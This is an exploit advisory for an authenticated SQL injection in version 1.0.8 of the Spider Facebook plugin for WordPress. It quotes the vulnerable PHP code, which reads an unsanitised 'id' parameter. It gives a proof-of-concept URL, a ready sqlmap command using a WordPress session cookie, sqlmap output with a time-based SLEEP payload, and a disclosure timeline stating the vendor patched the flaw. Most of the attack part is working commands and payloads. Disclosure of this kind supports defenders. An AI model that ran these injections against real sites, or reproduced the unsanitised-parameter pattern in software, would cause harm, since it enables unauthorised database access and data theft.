######################
# Exploit Title : WordPress Spider Facebook 1.0.8 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location :
http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
######################
# Vulnerable code :
function Spider_Facebook_manage()
{
require_once("facebook_manager.php");
require_once("facbook_manager.html.php");
if(!function_exists ('print_html_nav' ))
require_once("nav_function/nav_html_func.php");
global $wpdb;
if(isset($_GET['id']))
{
$id=$_GET['id'];
}
else
{
$id=0;
}
######################
# PoC Exploit:
http://localhost/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2
# Exploit Code via sqlmap:
sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' \
-u "http://localhost/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1" -p id --dbms=mysql
[21:27:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
...
...
...
---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 AND SLEEP(5)
---
# PoC Video:
https://www.youtube.com/watch?v=CcuvHLWnjZo
######################
# Vulnerability Disclosure Timeline:
2014-08-25: Discovered vulnerability
2014-09-04: Vendor Notification (Web Customers Service Form)
2014-09-05: Vendor Response/Feedback
2014-09-05: Vendor Fix/Patch
2014-09-05: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################